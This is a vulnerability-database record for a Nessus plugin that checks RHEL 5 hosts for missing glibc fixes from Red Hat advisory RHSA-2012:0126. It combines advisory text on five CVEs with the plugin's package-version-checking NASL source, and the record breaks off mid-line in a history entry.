{"id": "REDHAT-RHSA-2012-0126.NASL", "bulletinFamily": "scanner", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "description": "Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "published": "2012-02-14T00:00:00", "modified": "2018-11-26T00:00:00", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "reporter": "Tenable", "references": ["https://access.redhat.com/security/cve/cve-2009-5029", "https://access.redhat.com/security/cve/cve-2011-4609", "https://access.redhat.com/security/cve/cve-2009-5064", "https://access.redhat.com/errata/RHSA-2012:0126", "https://access.redhat.com/security/cve/cve-2011-1089", "https://access.redhat.com/security/cve/cve-2010-0830"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "type": "nessus", "lastseen": "2019-01-16T20:13:09", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 4, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "7ea5745f2768c008b8db4a80ab53f8e28768b1d6da8d64c140f4063efede077e", "hashmap": [{"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "eaa4ed87336e2e51d149ce6e262dadbe", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "981bbd9e32ffd82a8b6a813b152e8432", "key": "sourceData"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2018-02-05T22:54:59", "modified": "2018-02-05T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2018/02/05 14:47:53 $\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_osvdb_id(65077, 74278, 74883, 77508, 78316);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n }\n}\n", "title": "RHEL 5 : glibc (RHSA-2012:0126)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-02-05T22:54:59"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "p-cpe:/a:redhat:enterprise_linux:glibc-headers"], "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple programs on the system. These packages contain the standard C and the standard math libraries. Without these two libraries, a Linux system cannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library read timezone files. If a carefully-crafted timezone file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically linked libraries. If an attacker could trick a user into running ldd on a malicious binary, it could result in arbitrary code execution with the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way the glibc library loaded ELF (Executable and Linking Format) files. If a carefully-crafted ELF file was loaded by an application linked against glibc, it could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various mount helper utilities, did not handle certain errors correctly when updating the mtab (mounted file systems table) file. If such utilities had the setuid bit set, a local attacker could use this flaw to corrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC) implementation in glibc. A remote attacker able to open a large number of connections to an RPC service that is using the RPC implementation from glibc, could use this flaw to make that service use an excessive amount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu Security Team acknowledges Dan Rosenberg as the original reporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these issues.", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "bc1b07386c4ebe028ae7faf5924a6b729cc27b2f35f73ce0132026cc3621dd81", "hashmap": [{"hash": "7dd1d3f0577cd1e5fd960493c5598946", "key": "sourceData"}, {"hash": "5a5a54611766f3da3ce3cb528f3027a4", "key": "references"}, {"hash": "ae0665ae2f88d638e0907d932dfcc493", "key": "cpe"}, {"hash": "6f8115c44826ba13de903bb0d26a7d5b", "key": "cvelist"}, {"hash": "7962711bd7650e97eb287d800fd6fd3a", "key": "description"}, {"hash": "8825cfcc6a68eb22807158b2fdce98f8", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2c579aa4e476f52de92baf9b41b1db07", "key": "title"}, {"hash": "7c885de43ac8c8fec677c5a50f1ca9e9", "key": "published"}, {"hash": "3b4231700df65bd1e280187eabbb0395", "key": "pluginID"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "c4f16ed276157b63b39f28c10395355d", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=57929", "id": "REDHAT-RHSA-2012-0126.NASL", "lastseen": "2018-07-30T13:34:30", "modified": "2018-07-25T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "57929", "published": "2012-02-14T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2012-0126.html", "https://www.redhat.com/security/data/cve/CVE-2011-4609.html", "https://www.redhat.com/security/data/cve/CVE-2011-1089.html", "https://www.redhat.com/security/data/cve/CVE-2010-0830.html", "https://www.redhat.com/security/data/cve/CVE-2009-5029.html", "https://www.redhat.com/security/data/cve/CVE-2009-5064.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57929);\n script_version (\"1.14\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"RHEL 5 : glibc (RHSA-2012:0126)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5029.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-5064.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-0830.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-1089.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2011-4609.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2012-0126.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0126\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", 